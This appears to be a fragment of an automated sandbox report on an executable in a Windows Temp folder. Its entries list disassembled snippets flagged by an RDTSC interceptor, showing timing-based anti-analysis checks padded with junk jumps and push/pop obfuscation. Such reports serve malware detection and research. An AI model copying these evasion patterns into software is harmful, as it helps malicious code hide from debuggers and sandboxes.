Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F4741D second address: F4742D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F473118FE56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F4742D second address: F47433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F47433 second address: F47437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F47437 second address: F4743D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F4743D second address: F47442 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F460E9 second address: F460F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F460F6 second address: F46100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F473118FE56h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F46100 second address: F4610A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F463F8 second address: F46405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F473118FE56h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F46405 second address: F46411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F47311907A6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F46411 second address: F4641B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F473118FE56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F465C3 second address: F465C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F465C9 second address: F465CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F465CF second address: F465D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F465D3 second address: F4661F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F473118FE67h 0x0000000e jmp 00007F473118FE5Fh 0x00000013 push esi 0x00000014 jo 00007F473118FE56h 0x0000001a jmp 00007F473118FE62h 0x0000001f pop esi 0x00000020 push esi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F4D8B6 second address: F4D8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F4D8BC second address: F4D8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F4D8C0 second address: F4D8CA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F47311907A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F4D8CA second address: F4D8E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F473118FE64h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F4D8E9 second address: F4D8FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F47311907A6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F5DB9E second address: F5DBAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F473118FE56h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F5DBAD second address: F5DBB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F5DA2D second address: F5DA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F574E3 second address: F574F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47311907B1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F83DF5 second address: F83DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F84194 second address: F841AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47311907B5h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F841AD second address: F841B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F86574 second address: F8657E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F47311907A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F8657E second address: F86584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F86584 second address: F86599 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47311907B1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F86599 second address: F865C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F473118FE60h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F865C3 second address: F865D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907B2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F88E3F second address: F88E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F890EB second address: F890F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F47311907A6h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F89380 second address: F89420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F473118FE65h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F473118FE58h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 push dword ptr [ebp+122D2EEDh] 0x0000002d jns 00007F473118FE6Ch 0x00000033 jmp 00007F473118FE69h 0x00000038 call 00007F473118FE59h 0x0000003d push eax 0x0000003e push edx 0x0000003f js 00007F473118FE69h 0x00000045 jmp 00007F473118FE63h 0x0000004a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F89420 second address: F89426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F89426 second address: F8942A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F8942A second address: F8942E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F8942E second address: F8945C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jp 00007F473118FE58h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F473118FE5Fh 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F8945C second address: F89463 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F89463 second address: F89472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F89472 second address: F89476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F89476 second address: F89491 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E57C60 second address: E57C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E57C66 second address: E57C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F473118FE56h 0x0000000a popad 0x0000000b pushad 0x0000000c jnc 00007F473118FE56h 0x00000012 jmp 00007F473118FE64h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E57C8E second address: E57CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47311907B4h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F8AA80 second address: F8AA86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F8AA86 second address: F8AA8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F8CAE7 second address: F8CB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F473118FE61h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F8CB01 second address: F8CB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F8CB05 second address: F8CB1B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F473118FE56h 0x00000008 ja 00007F473118FE56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0EED second address: 50E0F37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ecx, 506AA813h 0x00000010 jmp 00007F47311907B8h 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007F47311907ABh 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e push esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0F37 second address: 50E0F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 mov eax, edx 0x00000008 pop edi 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F473118FE61h 0x00000013 or cx, 1EE6h 0x00000018 jmp 00007F473118FE61h 0x0000001d popfd 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F473118FE5Dh 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50D0DF5 second address: 50D0DFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50D0DFB second address: 50D0E27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F473118FE60h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ecx, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 movsx edx, cx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50D0E27 second address: 50D0E7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F47311907B0h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F47311907ADh 0x0000001b or eax, 644C2656h 0x00000021 jmp 00007F47311907B1h 0x00000026 popfd 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50D0E7F second address: 50D0E9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F473118FE5Dh 0x00000008 mov di, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov esi, edx 0x00000014 mov bh, 4Ah 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 51200EE second address: 51200F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 51200F4 second address: 51200F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 51200F8 second address: 5120159 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F47311907B9h 0x00000012 add ecx, 10EBF8C6h 0x00000018 jmp 00007F47311907B1h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F47311907B0h 0x00000024 xor ax, 5968h 0x00000029 jmp 00007F47311907ABh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 5120159 second address: 5120171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F473118FE64h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 5120171 second address: 51201A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F47311907B7h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 mov ebx, 6C6584D4h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B0103 second address: 50B0113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F473118FE5Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B0113 second address: 50B0128 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edi, 2140E46Ch 0x00000011 movsx ebx, cx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B0128 second address: 50B01A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F473118FE66h 0x00000011 mov ebp, esp 0x00000013 jmp 00007F473118FE60h 0x00000018 push dword ptr [ebp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push edx 0x0000001f pop esi 0x00000020 pushfd 0x00000021 jmp 00007F473118FE69h 0x00000026 xor cl, FFFFFFB6h 0x00000029 jmp 00007F473118FE61h 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50D0B73 second address: 50D0B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50D0B77 second address: 50D0B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50D0B7B second address: 50D0B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50D0B81 second address: 50D0BD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 jmp 00007F473118FE67h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007F473118FE65h 0x00000018 xor ecx, 5B1F6EE6h 0x0000001e jmp 00007F473118FE61h 0x00000023 popfd 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50D0BD3 second address: 50D0BE7 instructions: 0x00000000 rdtsc 0x00000002 mov di, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 movzx eax, bx 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ah, 1Ah 0x00000011 mov eax, edx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50D0772 second address: 50D0784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F473118FE5Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E02B4 second address: 50E02C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47311907AEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E02C6 second address: 50E030B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F473118FE5Bh 0x00000015 sbb esi, 0CF53BDEh 0x0000001b jmp 00007F473118FE69h 0x00000020 popfd 0x00000021 movzx esi, dx 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E030B second address: 50E0386 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F47311907AEh 0x00000012 and si, 7308h 0x00000017 jmp 00007F47311907ABh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F47311907B8h 0x00000023 or si, 1568h 0x00000028 jmp 00007F47311907ABh 0x0000002d popfd 0x0000002e popad 0x0000002f pop ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 mov ax, di 0x00000036 jmp 00007F47311907B7h 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 512000C second address: 5120052 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 0745874Dh 0x00000008 pushfd 0x00000009 jmp 00007F473118FE5Ah 0x0000000e and cx, 8668h 0x00000013 jmp 00007F473118FE5Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push edi 0x00000021 pop esi 0x00000022 call 00007F473118FE67h 0x00000027 pop esi 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50D05A0 second address: 50D05B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 mov ah, 19h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bx, FD12h 0x00000013 push edx 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0E1E second address: 50E0E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0E22 second address: 50E0E35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0E35 second address: 50E0E90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F473118FE5Eh 0x0000000f push eax 0x00000010 jmp 00007F473118FE5Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F473118FE66h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov di, 0E00h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
